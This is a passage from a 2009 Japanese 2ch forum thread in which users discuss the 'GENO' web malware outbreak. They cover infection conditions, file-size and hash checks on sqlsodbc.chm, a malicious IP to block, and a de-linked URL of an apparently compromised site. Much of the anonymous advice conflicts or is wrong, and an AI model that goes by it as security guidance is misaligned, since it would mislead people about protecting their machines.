562 ナノハナ(愛媛県):2009/05/17(日) 23:41:52.26 ID:fkFcHUl0


コンパイル済み HTML ヘルプ ファイル
49.5 KB (50,727 バイト)
44.0 KB (45,056 バイト)
563 バラ(秋田県):2009/05/17(日) 23:41:58.55 ID:SNHGg7cv
なんかMSの陰謀の気がしてきた
564 アルストロメリア(神奈川県):2009/05/17(日) 23:42:10.02 ID:I8b7rFs7
この騒動はXP切り捨てるための陰謀だったんだよ!
565 フデリンドウ(アラバマ州):2009/05/17(日) 23:42:10.82 ID:5GYYwEGs
>>548
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/internet/1242450264/
このスレの401さんに
自分が感染しなかったことを報告してみて。
それで、本当に感染しなかったかどうか分かるから。
566 ヤブツバキ(広島県):2009/05/17(日) 23:42:26.59 ID:MYa7iwNj
2ちゃんとニコニコが見れれば感染してもいいじゃん
567 オキザリス(東京都):2009/05/17(日) 23:42:47.91 ID:OT2LLMTM
>>555
SFTPは普通に使うなら良いんだけど、1サーバに200ユーザとか入れてる
ホスティングサービスとかだと、数十人が同時に使うとCPUへの負荷が
結構な物になるので、未だにFTPしか用意していないサーバって結構あるんだよ。

個人や趣味ならまだしも、企業とかでそういうサーバを使っているってのは
問題だとは思うんだが。
568 ギシギシ:2009/05/17(日) 23:42:53.58 ID:cg2kd3v7
>>559
Avastすり抜けてくる奴もいるってさ…
569 スズナ(アラバマ州):2009/05/17(日) 23:43:52.31 ID:jJW7D3CE
f639afde02547603a3d3930ee4bf8c12だった
570 ケンタウレア・モンタナ(関東):2009/05/17(日) 23:43:58.42 ID:PFoIP620 BE:1557589695-2BP(7670)

怖くてオナネタすら探せない
571 ペラルゴニウム(アラバマ州):2009/05/17(日) 23:44:04.75 ID:JqrHXXra
例外はあるが、大雑把にまとめると

XPを使用

IE6か7を使用

AdobeFlashPlayer、AdobePdfReaderのverが古い

これが確実に感染するPC
それ以外でも感染しないとは言えないけどね、ってのが現状
亜種祭りにならなければ(もうなってるかw)、ニュー速民には脅威ではない
572 ヒマラヤユキノシタ(山陰地方):2009/05/17(日) 23:44:10.83 ID:72kAzcv0
>>568
もうadobe消そうかな・・・
573 イワカガミダマシ(大分県):2009/05/17(日) 23:44:56.27 ID:Weh+w8gk
このスレ見てたらどのサイトも怖くて見れないでござる
574 モリシマアカシア(アラバマ州):2009/05/17(日) 23:45:18.03 ID:78Ssa5kx
エロサイトでネタ漁るの自重しよう
575 サンシュ(長野県):2009/05/17(日) 23:46:15.00 ID:SSI4EHwH
情弱ですまんが、>>459のファイルサイズとばっちり一致しちまったんだけど、クリーンインストールすればもうそれでいいんだよな!?
ちなみに家のXPはネットの接続がとにかく悪くてアップデートさえしてもらえない・・・インストールもウイルススキャンもできない始末
576 オウギカズラ(大阪府):2009/05/17(日) 23:47:22.37 ID:b2j55ziw
UACで動作防げるマルウェアなんていくらでもあるし陰謀とかあり得んだろw

>>568
アバストは8割ぐらい検出とか書いてたな
赤傘はまだかな
>>569
おめでとう
577 シンビジューム(広島県):2009/05/17(日) 23:47:25.69 ID:SCgJZwhB
ttp://www.seibidoshuppan.co.jp/
思いっきりコレを踏んだわけだが
sqlsodbc.chmのファイルサイズには変化はみられないし大丈夫か?
コマンドプロンプトもレジストリエディタも起動できた
578 パンジー(福岡県):2009/05/17(日) 23:47:43.74 ID:B4cic04o
>>568
もうそれ亜種じゃない新種
579 カキツバタ(愛知県):2009/05/17(日) 23:47:43.73 ID:x2F1Nl1F
FlashPlayerてんこ盛りのサイトは氏ねってことだね。

まぁそれはともかくバージョンアップをなんてまともにやっていない端末が
多いだろうからどう考えてもオワタだろ。ましてやOSのサービスパックすら
満足に当ててない端末とかも普通にあるだろうしな。
580 ギシギシ:2009/05/17(日) 23:48:21.86 ID:cg2kd3v7
>>572
うちもAvastが今日1回ブロックしてるし。怖くてWEB見れねぇよ。。

>>575
2行目も症状なんじゃね?さっさと再インスコしる
581 セントランサス(長屋):2009/05/17(日) 23:48:24.30 ID:dLpKu73X
まとめサイト消えてない?
582 シロバナタンポポ(東京都):2009/05/17(日) 23:49:17.34 ID:ARglw2xD
>>>579
まぁそんなPCはGENOウィルスに関わらず古典的なウィルスに感染しまくってるよね
583 カキツバタ(愛知県):2009/05/17(日) 23:49:18.88 ID:x2F1Nl1F
>>577
亜種だと発見できない可能性がある。クリーンインスコ推奨かも…。( ´・ω・)
584 アルストロメリア(神奈川県):2009/05/17(日) 23:49:28.68 ID:I8b7rFs7
企業のPCとかもいっぱい感染してそうだ…
585 スズナ(富山県):2009/05/17(日) 23:50:12.03 ID:T6TELgPe
Windows vista
  C:\WINDOWS\Help\mui\0411\sqlsodbc.chm のサイズが50,727 bytesなら安全

亜種だと無駄みたいだが
586 サンシュ(東京都):2009/05/17(日) 23:50:13.59 ID:TVbfxF0n
ウィルス作った奴の就職活動手伝わされただけなんじゃね?
感染しても他のファイルには特段異常無し(クリーンインストールしなければならないとはいえ)
「実害が無い(?)が厄介なウィルス作りました、てへ」みたいな
587 イワウチワ(鳥取県):2009/05/17(日) 23:50:19.45 ID:avsNBbVp
XPもWindowsUpdateでUACを導入してくれないの?
588 プリムラ・フロンドーサ(関西・北陸):2009/05/17(日) 23:50:34.44 ID:G3SABgbM
>>579
SPはむやみやたらに導入すると逆に駄目だと聞いたことがあるけど?
589 スイセン(東日本):2009/05/17(日) 23:50:36.94 ID:pSBKelp4
>>568
okwwww
590 ユキノシタ(関東地方):2009/05/17(日) 23:50:54.02 ID:fLKMb4aM
うっかりクリック防止用にも疑わしいアドレスはhだけじゃなく
ttpまで削って欲しい
591 オオイヌノフグリ(チリ):2009/05/17(日) 23:51:04.37 ID:02/xJYag
avastでとりあえず第一次防疫
adobe readerを入れないこと・flashを最新版にすることで第二次防疫
ルータで94.247.2.195とのパケット送受信を拒否で第三次防疫
できるならユーザ権限を管理者から一般に移して最終防疫
IE8・operaとかは予備
って感じか

とりあえず最後の権限だけどうするかだな・・・
インスコのたびにユーザ切り替えはなぁ・・・
592 ギシギシ:2009/05/17(日) 23:51:06.72 ID:cg2kd3v7
>>584
>571の環境で即思いついたのが、お前らの嫌いなあそこの本社なんだが。
珍しく赤字って報道されてた、あそこ。
593 菜の花(宮城県):2009/05/17(日) 23:51:14.59 ID:FYSoDu6x
>>584
明日からは更にヤバそうね
594 オキザリス(東京都):2009/05/17(日) 23:51:14.42 ID:OT2LLMTM
>>584
流行ったのが週末だったのは、まだ救いがあるかも。
平日だったらもっと感染サイトが広がっているだろう。
595 ペラルゴニウム(アラバマ州):2009/05/17(日) 23:51:21.97 ID:JqrHXXra
>>584
個人はPdfなんか無くても良いけど、企業は必須だからなw
個人向けPCに、アドベなんかをプレインスコしてたのが悪いと思うぞ
596 カキツバタ(愛知県):2009/05/17(日) 23:51:37.79 ID:x2F1Nl1F
Vistaだから大丈夫とか言う奴もいるみたいだけど、
すり抜けする亜種が出てくる可能性が高いぞ。
597 イワウチワ(大阪府):2009/05/17(日) 23:51:51.95 ID:j5QqoQFP
月曜日からCO..JPとか.JPとかの企業ドメインが危ないな
どっか大きな会社がやられてニュースになってやっと周知かな
598 キバナスミレ(三重県):2009/05/17(日) 23:52:08.56 ID:nOXJy6Vb
>>591
そこでVistaですよ
599 ユキノシタ(関東地方):2009/05/17(日) 23:52:18.03 ID:fLKMb4aM
>>592
Tブーえす?
600 菜の花(宮城県):2009/05/17(日) 23:52:25.78 ID:FYSoDu6x
>>596
UACすり抜けたらMSが発狂するなw
601 クチベニシラン(長屋):2009/05/17(日) 23:52:45.06 ID:dnWUgm70
Acroreaderは軽いからってずっと7.0にしてたのに
釣られて9にしてみちゃいました
602 プリムラ・インボルクラータ(北陸地方):2009/05/17(日) 23:52:56.19 ID:UVBgy5IM
ver7.0でアップデートめんどいから、とりあえずアンインスコした。
603 プリムラ・ラウレンチアナ(東京都):2009/05/17(日) 23:53:10.83 ID:lY8UAOkX
>>596
まじか、怖いな
ビスタの俺も安心するのはまだ早かったか
604 アズマギク(大阪府):2009/05/17(日) 23:53:10.75 ID:FDFilUKO
こんだけ2chでは騒がれてるのに、普通のニュースでは全然取り上げもされないよな
PC詳しくない一般人や情弱とかどうするんだよこれ
605 クヌギ(東京都):2009/05/17(日) 23:53:21.32 ID:8jn3+NEA
          /)          
           ///)  
          /,.=゙''"/          
   /     i f ,.r='"-‐'つ____   キャッシュ消せばいいんだよ!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /
606 アカシデ(千葉県):2009/05/17(日) 23:53:37.82 ID:iKsfG5YE
>>596
昨日vistaでも感染確認とかあったけどデマだったんだ
607 ジュウニヒトエ(アラバマ州):2009/05/17(日) 23:53:54.59 ID:pHEo3uw6
>>602
俺も
608 ユキノシタ(関東地方):2009/05/17(日) 23:54:00.31 ID:fLKMb4aM
>>604
企業側としちゃ自社HPが攻撃サイトになってるなんて眼を背けたい事実だしな
609 ギシギシ:2009/05/17(日) 23:54:05.24 ID:cg2kd3v7
>>599
…ソコとも関係深いところ。んで日テレに近いとこ。
これで分かるな?w

マカフィー早く対応してやんなよ死んじゃうぞ。
610 イワカガミダマシ(神奈川県):2009/05/17(日) 23:54:13.27 ID:eXuMrqA8
>>596
XP厨が息を吹き返す…!
611 藤(東京都):2009/05/17(日) 23:54:17.02 ID:Se289yeX
まとめサイト繋がらないんだが・・
612 スズナ(アラバマ州):2009/05/17(日) 23:54:23.90 ID:ABIJ2zfn
>>592
トヨタかキャノンか?
613 キバナスミレ(三重県):2009/05/17(日) 23:54:27.59 ID:nOXJy6Vb
>>606
UAC切ってたんじゃねーの?
614 シュロ(神奈川県):2009/05/17(日) 23:55:13.46 ID:zOaT0o6T
UACはすり抜けは無理
すり抜けたらMSが黙ってないから
615 セキショウ(神奈川県):2009/05/17(日) 23:55:13.99 ID:sM0qpDm0
>>571
XP、IE6、FlashPlayer9、AdobePdfReader5
だけど今のところ掛かってなかった
616 ホトケノザ(長崎県):2009/05/17(日) 23:55:46.19 ID:Tr4vzbvG
>>609
はっきり書いてよ
感染サイト知らずに踏む人出てきちゃうジャン
617 スイセン(東日本):2009/05/17(日) 23:56:03.68 ID:pSBKelp4
Avast!にしたらWebシールドのためにブラウザのプロクシ設定を
アドレス localhost
ポート 12080

にしておくこと
618 カキツバタ(愛知県):2009/05/17(日) 23:56:19.56 ID:x2F1Nl1F
>>595
ソフトのマヌアルとか最近はpdfが多いから入れるしかない。
バス会社のWebで見られる時刻表もAcrobatで作っているところがボチボチあるしな。
619 藤(和歌山県):2009/05/17(日) 23:56:24.47 ID:xb7a/QpL
Adobeつかわねーから
アンインスコしてやった
620 菜の花(宮城県):2009/05/17(日) 23:56:34.85 ID:FYSoDu6x
>>605
GENOの中の人は死ね
621 イワウチワ(大阪府):2009/05/17(日) 23:56:44.03 ID:j5QqoQFP
ホームページをみていたら突然UACの確認画面が出てきて何割がはいを押さないかだけど
そんなに期待していいのか?
622 タマザキサクラソウ(栃木県):2009/05/17(日) 23:56:48.48 ID:kmiyNyNB
>>575
あのファイルがわずか1kbと言うことは考えられないな。開いてみて意味不明だったらアウト確定
623 トキワハゼ(catv?):2009/05/17(日) 23:56:52.97 ID:tPjzEKXa
で、結局これ感染すると何がどうまずいの?
一般人でウィルス知識ない俺にkwsk
624 ポロニア・ヘテロフィア(東京都):2009/05/17(日) 23:56:56.78 ID:BBCJlv9U
ブラスター以来の騒ぎになるの?
625 オオイヌノフグリ(チリ):2009/05/17(日) 23:57:04.52 ID:02/xJYag
>>598
借り物PCがVistaだったけどいまいちUACがどんなものかわからんのだが

とりあえずメイン垢を制限ユーザにした
管理者垢作って10桁オーバーのパスつけた

これでいいのかねぇ
626 斑入りカキドオシ(石川県):2009/05/17(日) 23:57:13.30 ID:JaLtUjBz
キャッシュをクリアしてください(キリッ
627 オウギカズラ(大阪府):2009/05/17(日) 23:58:16.10 ID:b2j55ziw
UACすり抜けるとかちょっと考えにくいけど
そんな可能性考えてたら切りないぞw
仮想化ソフトのバグで環境内から漏れるとかいうのあったけどなw
とりあえずhipsとUAC併用で大抵防げると思う
>>606
警告の意味解らずぽんぽんクリックしてたりとか
UAC切ってたりとかしたら感染あり得る
628 バーベナ(北海道):2009/05/17(日) 23:58:16.78 ID:XOVShe4J
ひとまず感染していないことはわかったけどAdobe Readerが最新版じゃないから今から最新版にしたほうがいい?
それともアンインスコしたほうがいい?
Adobe ReaderとAdobe Acrobat Readerって違うんだね
629 クマガイソウ(三重県):2009/05/17(日) 23:58:32.60 ID:CA52I+eF
ブラスターがフリーザ級だとしたら
GENOウィルスはどれくらい?
630 アルストロメリア(神奈川県):2009/05/17(日) 23:58:40.50 ID:I8b7rFs7
月曜の朝から真のパンデミックが始まるのか…
631 キショウブ(滋賀県):2009/05/17(日) 23:59:03.19 ID:RN0a72q8
トンフルとGENOの二穴攻め・・・
もういくしかねえな・・・
632 マーガレット(大阪府):2009/05/17(日) 23:59:12.21 ID:tW624C7U
sqlsodbc.chmのサイズで感染かどうか判別してたけど
亜種は無理なんだって?

ハッシュで判断すればいいんじゃないの?
633 タマザキサクラソウ(栃木県):2009/05/17(日) 23:59:16.86 ID:kmiyNyNB
>>593
XPをメインで利用していたのがあだになったよな
634 福寿草(東京都):2009/05/18(月) 00:00:00.82 ID:hFA2hoOy
>>616
サイトは大丈夫だよ多分。

ただ、社員数がパネェから保守連中が死ぬだろうなw
635 シャクヤク(福島県):2009/05/18(月) 00:00:01.08 ID:0JUYVGeH
会社のPCとか勝手にフリーソフトとかインスコ出来ねーからな
デフォルトであどべ製品インスコされてるわ

こりゃ知らずに感染しちまうかも試練
636 カキドオシ(愛知県):2009/05/18(月) 00:00:07.50 ID:VhdL0w68
>>614
作った奴らなら簡単にその無理をこじ開けちゃいそうな気がする。
まぁ完璧なんてのはないよ。あったらアンチウィルスソフトやスパイウェアなんていらないしな。
637 ボケ(アラバマ州):2009/05/18(月) 00:00:11.65 ID:JqrHXXra
ところで、サイト→個人への感染はまあ何時もの手口だけど
サイトへの感染源はどうなってるの?管理者のPCがやられた?この広がりだと考え難いけど
感染者が閲覧しただけで広まるってことはないだろうし・・・
638 スズメノヤリ(富山県):2009/05/18(月) 00:00:20.04 ID:T6TELgPe
たな「Webウイルス」が猛威、感染被害が急増 英ソフォスが報告、正規サイトでもWebアクセスで被害の恐れ
//itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/
このウイルスをWebページに埋め込む。
そのページにユーザーがアクセスすると、埋め込まれたウイルスが動き出し
別のウイルスを勝手にインストールされる恐れなどがある。

通販サイトやウェブメール等、WEBブラウザを介したWEBサービスで利用する
IDやパスワード、クレジットカード情報等の個人情報が抜かれる可能性もあります。
サイト管理人は自サイトのソースを見ることで書き換えを確認することができます。

>623
639 ビオラ(宮城県):2009/05/18(月) 00:00:23.03 ID:FYSoDu6x
>>632
いつまでもsqlsodbc.chmを改竄し続けてるとも限らないよ
もう既に違うファイルの改竄に切り替えてる可能性もある
640 ダリア(栃木県):2009/05/18(月) 00:00:28.78 ID:7EQSi5LN
>>596
UACを突破してWindowsフォルダ内を弄られるなことがあればそれは重大な欠陥となるな
641 アブラチャン(福島県):2009/05/18(月) 00:01:12.67 ID:YDfKi0ag
>>628
使わないなら削除で
642 アッツザクラ(大阪府):2009/05/18(月) 00:01:41.14 ID:pWW5mwzb
>>639
次々と転移する癌みたいだな
643 スカシタゴボウ(東日本):2009/05/18(月) 00:02:12.28 ID:YQEavO2e
>>64UACというがPCのパスがわかったらUACは突破できるよ
644 オキザリス・アデノフィラ(東京都):2009/05/18(月) 00:02:34.88 ID:OT2LLMTM
Windows NTには詳しくないんだけど
ドメイン参加していて制限かけていれば
システム絡みってユーザ権限じゃ変更出来ないんだよね?

でないと、感染したサイトが何らかの対応を今夜中にしてくれないと
明日から関連会社が大変なことになるんだが。
645 ビオラ(宮城県):2009/05/18(月) 00:02:35.49 ID:FYSoDu6x
PDFとFLVって半分ウィルスインストーラと化してるよなあ

Adobe社内でスクリプトエンジン開発してる奴ら無能すぎる
646 西洋オキナグサ(アラバマ州):2009/05/18(月) 00:03:17.12 ID:ZKtnQPRw
>>609
23Fとか隣のビルの5Fとかはマクばっかだぞ
647 バイカカラマツ(北海道):2009/05/18(月) 00:03:17.66 ID:Q7vn0bh5
XPメインユーザが狙い打ちって本家の陰謀?
Vista買ってただちに7に乗り換えて金落としまくれよってこと?
648 スズメノヤリ(富山県):2009/05/18(月) 00:04:03.23 ID:5lHI9U8y
>628
使わないなら削除
使うならAdobe reader 9.1.1とか最新のにアップデート
649 シュッコン・バーベナ(アラバマ州):2009/05/18(月) 00:04:08.07 ID:pHEo3uw6
情弱だからしばらくネットで遊ぶ気になれないぜ・・・
650 スズメノヤリ(アラバマ州):2009/05/18(月) 00:04:14.56 ID:6bEY3TrS
adobeの脆弱性のせいで感染してるってことでいいの?
それならばadobe製品を全力で消すが
651 スズメノヤリ(アラバマ州):2009/05/18(月) 00:04:49.82 ID:/A8VHK8/
陰謀なわけないし
だいたい、陰謀かどうかなんて関係ないだろ
652 バイカカラマツ(北海道):2009/05/18(月) 00:04:54.66 ID:Q7vn0bh5
>>641
>>648
たまに使うからとりあえず最新版にしておくかな・・・
653 エビネ(ネブラスカ州):2009/05/18(月) 00:05:01.96 ID:LSTNNSqz
明日から会社マジやべぇな。
pdfファイルばっかりだから使わないわけにもいかんし…
654 イワカガミダマシ(大阪府):2009/05/18(月) 00:05:15.85 ID:jclGrl7X
>>645
MSエクセルが必死こいてマクロを無効化したってのにな
結局、マクロの時みたいに実行時にスクリプトを実行しますがよろしいですか?って聞くようにするしかないのか
655 チューリップ(東京都):2009/05/18(月) 00:05:16.98 ID:KaA7l4P9
市況板の住人とか 感染多そうな感じするがな・・

株やってると PDF読める環境は必須だし・・・
656 ラフレシア(大阪府):2009/05/18(月) 00:06:02.92 ID:RcVtYHrR
でも、企業のPCなんてXPばかりだし、Adobe Readerなんか更新欠けていない奴がほとんどだし
本格的にやばいんじゃね?
657 オウバイ(大阪府):2009/05/18(月) 00:07:11.01 ID:ker7VPvN
>>643
ねーよw
658 シンフィアンドラ・ワンネリ(広島県):2009/05/18(月) 00:07:19.63 ID:e+X2D5Hc
ハッシュ値も見たけど変化無し、クリーンインスコめんどくせ
        *'``・* 。
        |     `*。
       ,。∩      *    もうどうにでもな〜れ
      + (´・ω・`) *。+゚
      `*。 ヽ、  つ *゚*
       `・+。*・' ゚⊃ +゚
       ☆   ∪~ 。*゚
        `・+。*・ ゚
659 ダリア(栃木県):2009/05/18(月) 00:07:26.40 ID:7EQSi5LN
>>656
管理者「ネットしないでください」
660 福寿草(東京都):2009/05/18(月) 00:07:44.60 ID:hFA2hoOy
>>646
へーそうなんだ。隣5Fはいいとして、23Fって何の部署んとこだろ…?

と、>644辺りがもうそこの関係者とかに見えてくるんだがw
でも、ドメイン&ユーザー権限で管理してる所も多いだろう品
661 スズメノヤリ(アラバマ州):2009/05/18(月) 00:08:06.63 ID:/A8VHK8/
ああ、ここ見てたら
実家の親と兄弟のPCが心配になってきたわ…

情弱揃いだからなあ
662 スズメノヤリ(東京都):2009/05/18(月) 00:08:09.05 ID:vx7e3KBK
デスクトップのキャプとマイドキュメントとkakikomi.txt流出させる亜種作られないかなw
663 オオイヌノフグリ(静岡県):2009/05/18(月) 00:08:09.28 ID:mM9Gb6La
うちの会社大丈夫かしら
664 スズメノヤリ(富山県):2009/05/18(月) 00:08:18.17 ID:5lHI9U8y
>653
こわければ
編集 環境設定から
adobe javascriptを使用のチェックを外す
665 カタクリ(大阪府):2009/05/18(月) 00:08:51.28 ID:TDSYE9RX
>>661
一般人なだけだろ
666 キバナノアマナ(三重県):2009/05/18(月) 00:09:44.97 ID:cw7xhMlL
もし会社のPCで感染したらどんな不都合がある?
重要なデータが入ってるPCならクビになったりするかな?
667 ヒメオドリコソウ(山陰地方):2009/05/18(月) 00:09:52.30 ID:1QBc68Js
ちょっと、そこらじゅうの会社のPCが麻痺したら不況が加速すんじゃん
すごいなウィルスww
668 イヌノフグリ(東京都):2009/05/18(月) 00:10:12.27 ID:9D8amyXN
サイトに感染って一体何なんだおおん
669 マーガレット(東京都):2009/05/18(月) 00:10:17.36 ID:2DMFEIFc
MSBlastは笑った
月に2,3度しか使わない妹のPCも、会社のデータ参照するだけの同僚のノートも感染とか
670 ミヤマアズマギク(dion軍):2009/05/18(月) 00:10:31.46 ID:ii1Tzdoq
adobe readerはアップデートしたがflash playerってなんだ
671 バラ(北海道):2009/05/18(月) 00:10:32.99 ID:GqIy1LGA
>>667
そこで儲かることをすれば
君も立派なビジネスマン
672 シナノコザクラ(関東・甲信越):2009/05/18(月) 00:10:40.45 ID:7n6joVzu
自称情報強者のXP厨さん達ならこんなの屁でもないだろ
673 スズメノヤリ(アラバマ州):2009/05/18(月) 00:10:53.51 ID:/A8VHK8/
怪しい情報を送受信してる
弾かなきゃならんIPは増え続けてるんだよな

どこかに一覧があると良いんだが
ああ、実家のルーター設定に飛んで行きてえ…
674 タンポポ(大阪府):2009/05/18(月) 00:10:55.49 ID:2xGikqCb
>639
まぁしばらく巡回しないのとcmdの起動とハッシュ値はみておくけど
面倒クサイ亜種だなぁ、ったく・・・

正常な状態のやつね
sqlsodbc.chm
ファイルサイズ:50,727バイト
CRC32:B61C7A80
MD5:F639AFDE02547603A3D3930EE4BF8C12
SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3
675 ベニバナヤマボウシ(愛知県):2009/05/18(月) 00:11:06.75 ID:KDXVmLZ3
avastなら安心なの?
676 ナツグミ(埼玉県):2009/05/18(月) 00:11:32.59 ID:WGSrXjw3
>>669
ケーブル繋いでるだけで感染してたな
677 ポピー(長崎県):2009/05/18(月) 00:11:54.70 ID:SD6G7ePy
>>666
あれ?過去ログに首になった人の書込みがあったはず・・・
会社のPCでいろんなもの落としててそれ全部上司に見られたって
上に不具合報告する前にこのスレ見とけばよかったって泣いてたよ
678 タツタソウ(静岡県):2009/05/18(月) 00:11:59.10 ID:eEziWn+k
ハッシュ値ってどうやってみるんだろ
ぐぐるの面倒だから教えてくれ
679 スィートアリッサム(中部地方):2009/05/18(月) 00:12:06.66 ID:9SGcW/pM
亜種亜種言われてるけど具体例出てなくね?
680 ムラサキサギゴケ(埼玉県):2009/05/18(月) 00:12:40.12 ID:zr+SKq5K
>>675
検出の可能性が「ある」ってレベル。駆除までできる対策ソフトは現状存在しない。
つか、現状ウイルスの動作を完全に把握できてる情報源が無い。
だからこそ、システムの再インスコしかないって言われてる。
681 オキザリス・アデノフィラ(東京都):2009/05/18(月) 00:12:40.82 ID:FL9uQAvB
>>666
その感染したマシンでFTP使用すると、IDとパスワード流出。
接続にID、PASSWD以外の制限が掛かっていないと
漏れたIDとPASSWDを使用しているサーバの中身を
全部チェックする羽目になる。

亜種とかで、そのクライアントからサーバのデータ書き換えまで
するようになったら、IP制限をかけてるサーバでも
感染元に早変わり。マジ勘弁してくれ。
682 ラフレシア(大阪府):2009/05/18(月) 00:12:49.18 ID:RcVtYHrR
>>666
クビにはならんが、おまえと上司には減給なり戒告なりの処分はあるだろう
683 シザンサス(アラバマ州):2009/05/18(月) 00:13:12.38 ID:jznykNpy
>>669
Meたん大勝利だったやつだっけか
684 アカシデ(東京都):2009/05/18(月) 00:13:21.34 ID:whIZ9qIO
会社のパソコンに関しては出社前に上司に経緯知らせて、自分が使うPCは速攻アプデトするしかなく音
685 オキザリス・アデノフィラ(東京都):2009/05/18(月) 00:13:56.47 ID:FL9uQAvB
>>673
そのためのリモートアシスタント機能じゃないか。
686 オオジシバリ(チリ):2009/05/18(月) 00:15:27.93 ID:l+oX7WDr
>>675
あくまでひとまずは、だろ

なんかね、管理者から制限ユーザに切り替えたらいろいろ違うとこ出てきて違和感バリバリだから戻した・・・
最新版への以降・FoxitもJavascript禁止・avastのwebスキャナーONですり抜けられたらもう諦めるわ・・・
687 ハナイバナ(神奈川県):2009/05/18(月) 00:15:29.30 ID:UhWYEB3j
>>666
そのレス番はなんかのフラグか
688 ミヤマヨメナ(神奈川県):2009/05/18(月) 00:16:15.62 ID:T0pgWRZo
出版社のホムペだと一瞬.cnチラっと見えたがなんともない
入ってるFlashのバージョンがウイルシを寄せ付けないんだろう
PDFはFoxitでJS関連のコンポーネントは入れてないのでおkだろう
689 オオイヌノフグリ(静岡県):2009/05/18(月) 00:16:37.09 ID:mM9Gb6La
ダミアンw
690 クモマグサ(catv?):2009/05/18(月) 00:17:05.22 ID:P54A3RzG
>>679
出し様が無いと思う。
強いて挙げるなら、regedit, cmdが起動可能な亜種が出てる。
後は埋め込まれるJSにChromeが追加されてる。

核となるファイルもランダム生成されてて、感染してるか否かも判断し難い。
殆どのウイルスベンダが対応出来て無い現状。
691 ノミノフスマ(関西地方):2009/05/18(月) 00:17:33.34 ID:D72exIOe
俺は情弱なんだと思い知らされた
>>29を信じてやったら
ネットに接続できなくなった\(^o^)/

こいつの文章コピペしてたからなんとかなったけど
危うくリカバリってレベルだ
結局俺はお前らに搾取される存在なんだな
692 スカシタゴボウ(東日本):2009/05/18(月) 00:17:35.15 ID:YQEavO2e
というかだなブラウザもかえとけと
IE系はファイルをOFficeで流用してる可能性があるから
693 プリムラ・ヒルスタ(山陽):2009/05/18(月) 00:18:05.27 ID:odIz2fcw
vistaは大丈夫って聞いたけどどゆこと?
教えてエロい人
694 シザンサス(アラバマ州):2009/05/18(月) 00:18:33.88 ID:jznykNpy
695 ベゴニア・センパフローレンス(神奈川県):2009/05/18(月) 00:18:44.38 ID:/ho4xK2D
すごいウイルスが出てきたもんだな
696 フモトスミレ(奈良県):2009/05/18(月) 00:18:52.59 ID:WLTyKRaP
>>686
そこまでやって感染したらそれはもう新種
697 桜(福岡県):2009/05/18(月) 00:19:39.85 ID:K80uLwbM
940 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:04:22.10 ID:AhXwTJEf
ID:8fz7e8f5 ですが自宅のPCから書き込み
自主退社という形になりました
逝ってきます
このウイルスが世界中に広がりますように
698 ニガナ(千葉県):2009/05/18(月) 00:19:54.17 ID:iXhr/OZs
外に出れば新型インフルの猛威、仮想世界に飛び込んだらGENOウイルスの恐怖。
無職引きこもりはどうすればいいの?
699 カキドオシ(愛知県):2009/05/18(月) 00:20:07.04 ID:VhdL0w68
>>692
プルニが一番使いやすい。Operaとか火狐は使いにくくて涙目なんだよな。
700 アルメリア(神奈川県):2009/05/18(月) 00:20:10.55 ID:WLsua1If
本当にPC版のエイズウイルスみたいだな
どれほどの悪意がこれを生み出したのか
701 タンポポ(大阪府):2009/05/18(月) 00:20:11.21 ID:2xGikqCb
>678
「右クリック ハッシュ」で検索するか
HashTabってソフトを入れると良いよ

右クリック→プロパティでハッシュ値が見れるようになる
ttp://pai.no.land.to/up/src/dgz9140.jpg
702 スカシタゴボウ(東日本):2009/05/18(月) 00:20:12.44 ID:YQEavO2e
>>686
制限ユーザのほうが何かと安心だぞ
703 シュッコン・バーベナ(アラバマ州):2009/05/18(月) 00:20:43.32 ID:2GcPGtJu
>>691
真の情弱の俺は見ない弄らない触らないだ
まとめサイトも怖いから見ないぜ
704 マムシグサ(岡山県):2009/05/18(月) 00:20:55.30 ID:uKaX8zMq
sqlsodbc.chmについて

キーロガーのログ部分だね。おいらが見たのは反対からセーブしているやつだった。たとえば
あいうえお

おえういあ

らしい。つまり
感染しててまだFTP使用してないとsqlsodbc.chmはデフォのままで
感染確認としては弱いかもね
時既に遅しの場合のみ確認が出来るって感じかな
705 バラ(北海道):2009/05/18(月) 00:20:59.96 ID:GqIy1LGA
>>699
数日したらOperaか火狐は手放せなくなる存在だから
この機会に乗り換えとけ
706 ムラサキサギゴケ(埼玉県):2009/05/18(月) 00:21:16.30 ID:zr+SKq5K
>>700
「お金欲しい」っていう比較的単純な欲望だと思われ。
ダシにされるこちらはたまったものじゃないが。
707 ショウジョウバカマ(関西):2009/05/18(月) 00:21:46.77 ID:c1H9H+uI
ハッシュ値とかMD5ってなんだ。わからん
プロパティにそんなもんねーぞ
708 イヌノフグリ(東京都):2009/05/18(月) 00:22:01.30 ID:9D8amyXN
もうネットは大学のパソコンからしかやらぬ
709 マーガレット(東京都):2009/05/18(月) 00:22:10.61 ID:2DMFEIFc
225時価総額上位の企業サイトが感染したらIR経由で凄いことにならないかな
100%Reader使ってあるから
710 フリージア(北海道):2009/05/18(月) 00:22:14.73 ID:pHiEJvHU
>>707
ググれカス
711 桜(福岡県):2009/05/18(月) 00:22:28.08 ID:K80uLwbM
10 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 10:04:30.21 ID:8fz7e8f5
GENOよりも短縮貼った奴が許せない

21 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 10:08:03.67 ID:8fz7e8f5
たまご氏ね

144 名前: ケンタウレア・モンタナ(コネチカット州)[] 投稿日:2009/04/06(月) 10:55:46.05 ID:8fz7e8f5
自宅謹慎になったわ

160 名前: ケンタウレア・モンタナ(コネチカット州)[] 投稿日:2009/04/06(月) 11:02:51.43 ID:8fz7e8f5
もう会社行けない
もしかして俺が一番被害大きいんじゃねえの?

185 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 11:09:24.52 ID:8fz7e8f5
お前ら鳥インフルエンザにかかって死んでしまえ
     ~~~~~~~~~~~~~~~~~~~~~~~~~

このときすでにGENOウィルスとインフルエンザの新種を予言していたのか。
712 マーガレット(コネチカット州):2009/05/18(月) 00:22:38.30 ID:NMisL4cT
>>705
今、キツネはまずいだろ……
